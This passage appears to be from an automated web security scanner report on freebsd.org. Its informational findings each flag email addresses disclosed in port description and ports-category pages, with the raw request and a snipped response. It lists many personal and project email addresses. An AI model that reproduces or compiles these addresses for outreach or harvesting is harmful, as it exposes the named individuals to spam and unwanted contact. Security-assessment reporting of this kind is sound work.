User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:14 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
</A>

-- Sergey Skvortsov
skv@FreeBSD.org
</pre>
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.300. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:
  • jooji@nickelkid.com
  • ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/nn/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:10 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
</A>

- Jasper O'Malley
jooji@nickelkid.com
</pre>
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.301. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:
  • obrien@NUXI.com
  • ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/aub/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:17 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
</A>

-- David (obrien@NUXI.com)
</pre>
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.302. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:
  • egoshin@ihep.su
  • ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/nntpbtr/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:11 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<pre>
nntpbtr is high-throughput, well-buffered, crash-reliable, all-terrains
NNTP Bulk TRanfer program, written by Leonid Yegoshin &lt;egoshin@ihep.su>
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.303. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:
  • fehlner@gmx.de
  • ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/sn/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:34 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
</A>

-Andreas Fehlner
fehlner@gmx.de
</pre>
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.304. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:
  • pjenvey@groovie.org
  • ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/hellanzb/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:35 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
</A>

- Philip Jenvey &lt;pjenvey@groovie.org>
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.305. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The following email addresses were disclosed in the response:
  • petef@FreeBSD.org
  • ports@FreeBSD.org

Request

GET /cgi/url.cgi?ports/news/slrn/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:32 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
</A>

- Pete
petef@FreeBSD.org
</pre>
...[SNIP]...
<a href='../mailto.html'>ports@FreeBSD.org</a>
...[SNIP]...

24.306. http://www.freebsd.org/community/mailinglists.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /community/mailinglists.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /community/mailinglists.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "3146088003"
Last-Modified: Fri, 31 Dec 2010 18:24:30 GMT
Content-Length: 9654
Connection: close
Date: Mon, 24 Jan 2011 16:39:35 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator"
...[SNIP]...

24.307. http://www.freebsd.org/events/events.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /events/events.html

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /events/events.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "4277815952"
Last-Modified: Sun, 23 Jan 2011 00:03:02 GMT
Content-Length: 25411
Connection: close
Date: Mon, 24 Jan 2011 16:39:37 GMT
Server: httpd/1.4.x LaHonda

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...
<a href="mailto:www@FreeBSD.org">www@FreeBSD.org</a>
...[SNIP]...

24.308. http://www.freebsd.org/mailto.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /mailto.html

Issue detail

The following email addresses were disclosed in the response:
  • freebsd-doc@FreeBSD.org
  • freebsd-questions@FreeBSD.org

Request

GET /mailto.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "2773185839"
Last-Modified: Fri, 31 Dec 2010 18:24:30 GMT
Content-Length: 7151
Connection: close
Date: Mon, 24 Jan 2011 16:19:03 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator"
...[SNIP]...
<a href="mailto:freebsd-questions@FreeBSD.org">freebsd-questions@FreeBSD.org</a>
...[SNIP]...
<a href="mailto:freebsd-doc@FreeBSD.org">freebsd-doc@FreeBSD.org</a>
...[SNIP]...

24.309. http://www.freebsd.org/ports/archivers.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /ports/archivers.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ports/archivers.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "3287887936"
Last-Modified: Sun, 23 Jan 2011 02:29:29 GMT
Content-Length: 230320
Connection: close
Date: Mon, 24 Jan 2011 16:16:38 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: Archivers</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="te
...[SNIP]...

24.310. http://www.freebsd.org/ports/converters.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /ports/converters.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ports/converters.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "1132075618"
Last-Modified: Sun, 23 Jan 2011 02:29:30 GMT
Content-Length: 168789
Connection: close
Date: Mon, 24 Jan 2011 16:16:33 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: Converters</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="t
...[SNIP]...

24.311. http://www.freebsd.org/ports/editors.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /ports/editors.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ports/editors.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "904355811"
Last-Modified: Sun, 23 Jan 2011 02:29:30 GMT
Content-Length: 1577445
Connection: close
Date: Mon, 24 Jan 2011 16:16:34 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: Editors</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text
...[SNIP]...
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rodrigo@bebik.net">rodrigo@bebik.net</A>
...[SNIP]...
<A HREF="mailto:openoffice@FreeBSD.org">openoffice@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:openoffice@FreeBSD.org">openoffice@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:openoffice@FreeBSD.org">openoffice@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:openoffice@FreeBSD.org">openoffice@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:openoffice@FreeBSD.org">openoffice@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:cm@therek.net">cm@therek.net</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kamikaze@bsdforen.de">kamikaze@bsdforen.de</A>
...[SNIP]...
<A HREF="mailto:dougb@FreeBSD.org">dougb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dhn@FreeBSD.org">dhn@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bilbo@hobbiton.org">bilbo@hobbiton.org</A>
...[SNIP]...
<A HREF="mailto:arundel@FreeBSD.org">arundel@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:itetcu@FreeBSD.org">itetcu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:cyberbotx@cyberbotx.com">cyberbotx@cyberbotx.com</A>
...[SNIP]...
<A HREF="mailto:pav@FreeBSD.org">pav@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nobutaka@FreeBSD.org">nobutaka@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nobutaka@FreeBSD.org">nobutaka@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nobutaka@FreeBSD.org">nobutaka@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:exile@chamber.ee">exile@chamber.ee</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dryice@dryice.name">dryice@dryice.name</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sahil@FreeBSD.org">sahil@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:davide.italiano@gmail.com">davide.italiano@gmail.com</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rfarmer@predatorlabs.net">rfarmer@predatorlabs.net</A>
...[SNIP]...
<A HREF="mailto:makc@FreeBSD.org">makc@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lx@FreeBSD.org">lx@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:admin@mjbrune.org">admin@mjbrune.org</A>
...[SNIP]...
<A HREF="mailto:trebestie@gmail.com">trebestie@gmail.com</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ant@monitor.deis.unical.it">ant@monitor.deis.unical.it</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:buganini@gmail.com">buganini@gmail.com</A>
...[SNIP]...
<A HREF="mailto:jille@quis.cx">jille@quis.cx</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:joerg@FreeBSD.org">joerg@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obrien@FreeBSD.org">obrien@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gj@FreeBSD.org">gj@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obrien@FreeBSD.org">obrien@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obrien@FreeBSD.org">obrien@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:aldis@bsdroot.lv">aldis@bsdroot.lv</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nivit@FreeBSD.org">nivit@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vmagerya@gmail.com">vmagerya@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:saper@SAPER.INFO">saper@SAPER.INFO</A>
...[SNIP]...
<A HREF="mailto:jjuanino@gmail.com">jjuanino@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gj@FreeBSD.org">gj@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:citycat4@ngs.ru">citycat4@ngs.ru</A>
...[SNIP]...
<A HREF="mailto:martymac@FreeBSD.org">martymac@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:exile@chamber.ee">exile@chamber.ee</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rafan@FreeBSD.org">rafan@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:culot@FreeBSD.org">culot@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mike@mikelockwood.com">mike@mikelockwood.com</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...

24.312. http://www.freebsd.org/ports/ftp.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /ports/ftp.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ports/ftp.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "1534656558"
Last-Modified: Sun, 23 Jan 2011 02:29:30 GMT
Content-Length: 251119
Connection: close
Date: Mon, 24 Jan 2011 16:16:41 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: Ftp</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/htm
...[SNIP]...

24.313. http://www.freebsd.org/ports/lang.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /ports/lang.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ports/lang.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "1944216595"
Last-Modified: Sun, 23 Jan 2011 02:29:32 GMT
Content-Length: 1008409
Connection: close
Date: Mon, 24 Jan 2011 16:16:33 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: Lang</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/ht
...[SNIP]...
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
